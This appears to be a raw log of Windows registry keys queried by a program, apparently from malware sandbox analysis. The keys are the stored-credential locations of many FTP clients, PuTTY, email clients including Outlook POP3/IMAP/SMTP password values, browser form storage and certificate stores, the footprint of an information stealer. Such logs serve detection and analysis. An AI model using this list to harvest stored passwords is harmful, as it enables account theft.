HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\vbc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_CURRENT_USER\Software\Adobe\Common
HKEY_CURRENT_USER\Software\ChromePlus
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CLASSES_ROOT\FTP++.Link\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\FTPServers
HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\FTPServers
HKEY_CURRENT_USER\SOFTWARE\Robo-FTP 3.7\Scripts
HKEY_LOCAL_MACHINE\SOFTWARE\Robo-FTP 3.7\Scripts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\MY\Keys
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\Software\CoffeeCup Software
HKEY_LOCAL_MACHINE\Software\CoffeeCup Software
HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\FTP
HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\FTP
HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\mru\jobs
HKEY_LOCAL_MACHINE\Software\Nico Mak Computing\WinZip\mru\jobs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Products\0371FF472F1B88D429B65186AF6ED17B
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Installer\Products\0371FF472F1B88D429B65186AF6ED17B
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\0371FF472F1B88D429B65186AF6ED17B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0371FF472F1B88D429B65186AF6ED17B\InstallProperties
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1822907384-1282624486-319450072-1000\Components\0371FF472F1B88D429B65186AF6ED17B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0371FF472F1B88D429B65186AF6ED17B
HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
HKEY_CURRENT_USER\Software\Microsoft\Windows Mail
HKEY_CURRENT_USER\Software\Microsoft\Windows Mail\Salt
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
HKEY_LOCAL_MACHINE\Software\RimArts\B2\Settings
HKEY_CURRENT_USER\Software\Poco Systems Inc
HKEY_LOCAL_MACHINE\Software\Poco Systems Inc
HKEY_CURRENT_USER\Software\IncrediMail
HKEY_LOCAL_MACHINE\Software\IncrediMail
HKEY_CURRENT_USER\Software\RIT\The Bat!
HKEY_CURRENT_USER\Software\RIT\The Bat!\Users depot
HKEY_LOCAL_MACHINE\Software\RIT\The Bat!
HKEY_LOCAL_MACHINE\Software\RIT\The Bat!\Users depot
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Identities
HKEY_CURRENT_USER\Identities\{141B4688-D8D4-4AD1-B583-99828374C040}\Software\Microsoft\Internet Account Manager\Accounts
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Account Manager\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password
